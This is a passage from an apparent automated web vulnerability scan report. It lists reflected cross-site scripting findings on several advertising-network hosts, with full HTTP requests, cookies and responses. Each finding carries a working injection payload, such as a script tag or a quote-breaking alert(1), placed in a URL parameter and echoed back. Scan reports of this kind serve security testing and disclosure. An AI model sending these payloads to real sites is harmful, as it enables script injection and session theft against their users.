Cookie: OAX=rcHW800iZiMAAocf; RMFL=011Pi745U102Og|U106t6; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/464947510/x2336d6c"><script>alert(1)</script>77e70440218/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320bc'-alert(1)-'47232191921 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384320bc'-alert(1)-'47232191921&pt2=0000951470&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwt43i6gQQt43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:47 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647287&Perf_Tracker_1=0000777384320bc'-alert(1)-'47232191921&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&imp_id=8886539978897813417&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEA
...[SNIP]...

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15a6a'-alert(1)-'5f2f4eb2edd was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=000095147015a6a'-alert(1)-'5f2f4eb2edd&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwu43i6gQQu43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:51 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647291&Perf_Tracker_1=0000777384&Perf_Tracker_2=000095147015a6a'-alert(1)-'5f2f4eb2edd&Perf_Tracker_3=1183&imp_id=5777077306698984031&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9484d'-alert(1)-'49a4b8e6987 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=0000951470&pt3=11839484d'-alert(1)-'49a4b8e6987&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwxI3i6gQQxI3i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P?+T?'k!>#Sc#R/_.pahEXh'cvTtWpuD_=4!=uT]=e@@#WVG93ZY4u96P7D+aP!tax]Ju:exw7qy2_^tYf4]Ks*mLs/?cJ7s(5OkFNF7RzUee7ff.clx*lGIRAg2$MyRF`BXtGX40>XC?a++^.Da3$bYGIIrIg(1hE@#:LqW#t?t5/fU+fe*QeH%EDs_I6?4YY(%]+YR<+z_`zKlZNe9rt`oUb>:fau[7cZIHG_g3=uY$Vn8QGa7bZ>98l0>?G#e>2oQfSw+%_CYI)SH>(th6H*wZ'jlrpS?-D3oG7m:6E3i1C-V6/Lu8a0)9ic+!svi3SbOWR@K@qm[Y3<Uao60GsPo#VSI>rzH'*wtSE@w9]P7GnDkd5ChirRZy]z/hEEdIV.#pX.l[.M`Y:xt*dhBwZTyVD0dqymyiGVt9JX%p[GOv?BCDIpgDKcnMq2Vk]4p.su4l[kAU#HhCFWY$[II-1ah0=>'sPu%'u!9jpej-X1ql[c]Hv%we*u(w)z!.NfM*1TN]R)fpBW12a=jT2RR>.VPit6J8Uu/JCap<-4=h-@n$`y6'#!.^ft^[Tgza()x1[6kr)xY]xd8aEAv6IWbIdu$_*8GP`NxDJhlg'LQ?5sbP>IKx-jQMmws[qwdPTV`%0/vB-p=h%JOl9]V%rn; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:35:00 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647300&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=11839484d'-alert(1)-'49a4b8e6987&imp_id=9182123578777281571&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAACMkwvS-dG1_BWHfHSmrE
...[SNIP]...

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ev.ib-ibi.com
Path:   /pibiview.js

Issue detail

The value of the xid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9831'%3balert(1)//11d8f3efe69 was submitted in the xid parameter. This input was echoed as d9831';alert(1)//11d8f3efe69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pibiview.js?go=2208&pid=12&xid=f978e9b0-271c-47b8-9a97-caba692f0bb2d9831'%3balert(1)//11d8f3efe69 HTTP/1.1
Host: ev.ib-ibi.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 02:28:46 GMT
Content-Length: 791

IB_PartnerViewSetupScript=new function(){this.LoadViewScript=function(){try{var s=window.document.createElement("script");s.setAttribute("type", "text/javascript");s.setAttribute("src", "https://ev.ib
...[SNIP]...
ld(s);}catch (Error){}};
this.ProcessRequest = function(){this.LoadViewScript();};}
function IBPartner(){}
IBPartner.prototype.Go='2208';IBPartner.prototype.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.prototype.Ida='';IBPartner.prototype.Pid='12'; IBPartner.prototype.Id1='';IBPartner.Go='2208';IBPartner.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.Ida=
...[SNIP]...

1.175. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5f074<script>alert(1)</script>ccdbedd4d61 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.haaretz.com%2Fnews%2Fdiplomacy-defense%2Freport-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218&uid=YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61&xy=0%2C0&wh=300%2C250&vchannel=1056349&cid=EPCV0111A&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CAF399AA1BA194759D134605EFF6C6D9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 14 Feb 2011 01:37:30 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61");

1.176. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6857d'-alert(1)-'6832ddace00 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=rkfhehSuCkCuR-F6FK4KQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAA4x3afwAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+537%2C+1297648513%29%3Buf%28%27c%27%2C+5740%2C+1297648513%29%3Buf%28%27r%27%2C+157827%2C+1297648513%29%3Bppv%28783%2C+%272450541691773813258%27%2C+1297648513%2C+1298944513%2C+5740%2C+25553%29%3B&cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00&referrer=http://www.drudgereport.com/&pp=TViLgQAFq_IK5TjPs25hd06kLUEGn6rqtMqyaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0wNTAyNzE3MDkxMjc5MzczsgEUd3d3LmRydWRnZXJlcG9ydC5jb226AQoxNjB4NjAwX2FzyAEJ2gEcaHR0cDovL3d3dy5kcnVkZ2VyZXBvcnQuY29tL5gCuBfAAgTIAquCpQ6oAwHoA_sD6AOMA-gDmQP1AwAAAsT1AyAAAAA%26num%3D1%26sig%3DAGiWqtw_eL9DBqAZ0PN7cEKlsXl5DladFA%26client%3Dca-pub-0502717091279373%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=600&slotname=6309509649&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297648551504&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297648551509&frm=1&adk=3377972691&ga_vid=1250234459.1297648552&ga_sid=1297648552&ga_hid=1841793208&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2928058547&eid=33895298&fu=0&ifi=1&dtd=8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEgj8iAEQChgBIAEoATDcjeLqBAoSCL-PARAKGAEgASgBMIuN4uoEEKGO4uoEGAQ.; acb717022=5_[r^208WMvBlUw20/dRC(+RZ?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQOEABvpoyVx2BWHfHSmrEEIhh1hNAAAAAMs4AwA3AQAANQEAAAIAAADifwEAploAAAEAAABVU0QAVVNEACwB-gBYDgAA0wgBAgUCAAUAAAAACRsvXwAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+3338%2C+1297647393%29%3Buf%28%27c%27%2C+15498%2C+1297647393%29%3Buf%28%27r%27%2C+98274%2C+1297647393%29%3Bppv%282932%2C+%278528913247041356001%27%2C+1297647393%2C+1297733793%2C+15498%2C+23206%29%3B&cnd=!bhaubAiKeRDi_wUYACCmtQEoADGprN67Pd8NQEITCAAQABgAIAEo_v__________AUgAUABY2BxgAGi1Ag..; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
